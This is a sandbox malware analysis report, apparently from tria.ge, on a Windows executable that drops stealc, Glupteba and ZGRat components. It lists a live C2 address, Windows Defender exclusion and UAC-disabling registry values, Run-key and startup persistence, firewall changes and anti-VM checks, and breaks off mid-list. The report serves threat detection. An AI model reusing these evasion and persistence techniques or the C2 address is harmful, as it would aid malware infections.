Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
296s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08/05/2024, 23:52
Static task
static1
Behavioral task
behavioral1
Sample
ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe
Resource
win7-20240508-en
General
-
Target
ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe
-
Size
521KB
-
MD5
6fbe36ef1d6599968f107c7b6eb19225
-
SHA1
8761289110102b0a661ffbe28ed7f0a730311c5e
-
SHA256
ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620
-
SHA512
cff59fcc496248772906e1c6a1cd5bfe7ece2103b52ed05fd2426fc5e1f5afd184821ee35a8d55f8ab32ddc24781fd733987d0a05f54df89a9478ac93d344428
-
SSDEEP
6144:39y51HwqQwU0PbQpf1oFdHr34eXHZCTUPEn0IlHgv59OxsDXqYe8RBCu97x+ucSR:3E51HwgRdLoeXMHnfHgzOi6kR5x+9aUI
Malware Config
Extracted
stealc
http://185.172.128.150
-
url_path
/c698e1bc8a2f5e6d.php
Signatures
-
Detect ZGRat V1 2 IoCs
resource yara_rule behavioral2/memory/4604-3648-0x0000023E6DD30000-0x0000023E6DD54000-memory.dmp family_zgrat_v1 behavioral2/memory/4604-3590-0x0000023E6F5C0000-0x0000023E6F6CA000-memory.dmp family_zgrat_v1 -
Glupteba payload 11 IoCs
resource yara_rule behavioral2/memory/3204-4928-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4934-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4940-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4943-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4946-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4949-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4952-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4955-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4958-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4961-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba behavioral2/memory/3204-4964-0x0000000000400000-0x0000000002957000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" xelY93icznpSl0utJlO9CTlz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" VaEY2hreTfB69fav3nHOe8uJ.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" 7nW5qIMaV8xajTNolXyNnr62.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5068 powershell.exe 1976 powershell.exe 4060 powershell.exe 4708 powershell.exe 5388 powershell.exe 6064 powershell.exe 6108 powershell.exe 4764 powershell.exe 5616 powershell.exe 2680 powershell.exe 4528 powershell.exe 4748 powershell.exe 3200 powershell.exe 3564 powershell.exe 5944 powershell.exe 6116 powershell.exe 5236 powershell.exe 4148 powershell.exe 4792 powershell.exe 3520 powershell.exe 5960 powershell.exe 5168 powershell.exe 6120 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 5256 netsh.exe 5988 netsh.exe 5092 netsh.exe 5384 netsh.exe -
Drops startup file 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IhdA8kGYCJ7pM22YuVOKDfB6.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K7gZzdgjUiY3QyM00vsQEIk5.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pQJacl2Bf7LzHavCMG3hKLj.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lM3zkzFQczpDAHvJH7vWTU0q.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHu5gmDPrdHQrxBALgEWcRKb.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUN0CKZe3wKRDvMmRMVSstse.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vjZEleAXp56EtwGN39UQAyp2.bat CasPol.exe -
Executes dropped EXE 18 IoCs
pid Process 3932 fKZRHEfYlQuPD6l3AskVdPrk.exe 4228 7nW5qIMaV8xajTNolXyNnr62.exe 1748 xelY93icznpSl0utJlO9CTlz.exe 4424 VaEY2hreTfB69fav3nHOe8uJ.exe 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe 508 u318.0.exe 5852 u318.1.exe 5592 BvKx9NZLLBJyqhaHtH6KEhmS.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5632 VaEY2hreTfB69fav3nHOe8uJ.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 3204 csrss.exe 1720 injector.exe 5056 windefender.exe 5276 windefender.exe 5920 dcb505dc2b9d8aac05f4ca0727f5eadb.exe 196 713674d5e968cbe2102394be0b2bae6f.exe 3968 1bf850b4d9587c1017a75a47680584c4.exe -
resource yara_rule behavioral2/files/0x000900000001ac42-4918.dat upx behavioral2/memory/5056-4922-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/files/0x000900000001ac42-4920.dat upx behavioral2/memory/5276-4932-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/memory/5276-4941-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral2/files/0x000600000001522b-5232.dat upx behavioral2/files/0x000600000001522c-5475.dat upx behavioral2/files/0x0004000000015251-5716.dat upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" xelY93icznpSl0utJlO9CTlz.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" 7nW5qIMaV8xajTNolXyNnr62.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" VaEY2hreTfB69fav3nHOe8uJ.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" xelY93icznpSl0utJlO9CTlz.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 7nW5qIMaV8xajTNolXyNnr62.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" VaEY2hreTfB69fav3nHOe8uJ.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 pastebin.com 2 pastebin.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2272 set thread context of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 7nW5qIMaV8xajTNolXyNnr62.exe File opened (read-only) \??\VBoxMiniRdrDN xelY93icznpSl0utJlO9CTlz.exe File opened (read-only) \??\VBoxMiniRdrDN BvKx9NZLLBJyqhaHtH6KEhmS.exe File opened (read-only) \??\VBoxMiniRdrDN VaEY2hreTfB69fav3nHOe8uJ.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe BvKx9NZLLBJyqhaHtH6KEhmS.exe File opened for modification C:\Windows\rss 7nW5qIMaV8xajTNolXyNnr62.exe File created C:\Windows\rss\csrss.exe 7nW5qIMaV8xajTNolXyNnr62.exe File opened for modification C:\Windows\rss VaEY2hreTfB69fav3nHOe8uJ.exe File created C:\Windows\rss\csrss.exe VaEY2hreTfB69fav3nHOe8uJ.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss BvKx9NZLLBJyqhaHtH6KEhmS.exe File opened for modification C:\Windows\rss xelY93icznpSl0utJlO9CTlz.exe File created C:\Windows\rss\csrss.exe xelY93icznpSl0utJlO9CTlz.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1772 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3192 508 WerFault.exe 85 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u318.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u318.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u318.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u318.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u318.0.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5248 schtasks.exe 2904 schtasks.exe -
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 99 Go-http-client/1.1 HTTP User-Agent header 100 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" xelY93icznpSl0utJlO9CTlz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" xelY93icznpSl0utJlO9CTlz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" 7nW5qIMaV8xajTNolXyNnr62.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" xelY93icznpSl0utJlO9CTlz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" BvKx9NZLLBJyqhaHtH6KEhmS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" 7nW5qIMaV8xajTNolXyNnr62.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" VaEY2hreTfB69fav3nHOe8uJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" VaEY2hreTfB69fav3nHOe8uJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" xelY93icznpSl0utJlO9CTlz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" BvKx9NZLLBJyqhaHtH6KEhmS.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" VaEY2hreTfB69fav3nHOe8uJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" VaEY2hreTfB69fav3nHOe8uJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" 7nW5qIMaV8xajTNolXyNnr62.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" 7nW5qIMaV8xajTNolXyNnr62.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" xelY93icznpSl0utJlO9CTlz.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5068 powershell.exe 5068 powershell.exe 5068 powershell.exe 4748 powershell.exe 4748 powershell.exe 1976 powershell.exe 1976 powershell.exe 3200 powershell.exe 3200 powershell.exe 4748 powershell.exe 1976 powershell.exe 3564 powershell.exe 3564 powershell.exe 3200 powershell.exe 3564 powershell.exe 4748 powershell.exe 1976 powershell.exe 3200 powershell.exe 3564 powershell.exe 4228 7nW5qIMaV8xajTNolXyNnr62.exe 4424 VaEY2hreTfB69fav3nHOe8uJ.exe 4228 7nW5qIMaV8xajTNolXyNnr62.exe 4424 VaEY2hreTfB69fav3nHOe8uJ.exe 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe 1748 xelY93icznpSl0utJlO9CTlz.exe 1748 xelY93icznpSl0utJlO9CTlz.exe 5944 powershell.exe 5944 powershell.exe 5960 powershell.exe 5960 powershell.exe 5944 powershell.exe 5960 powershell.exe 6116 powershell.exe 6116 powershell.exe 6108 powershell.exe 6108 powershell.exe 5944 powershell.exe 6116 powershell.exe 5960 powershell.exe 6108 powershell.exe 6116 powershell.exe 6108 powershell.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5676 7nW5qIMaV8xajTNolXyNnr62.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5592 BvKx9NZLLBJyqhaHtH6KEhmS.exe 5592 BvKx9NZLLBJyqhaHtH6KEhmS.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5604 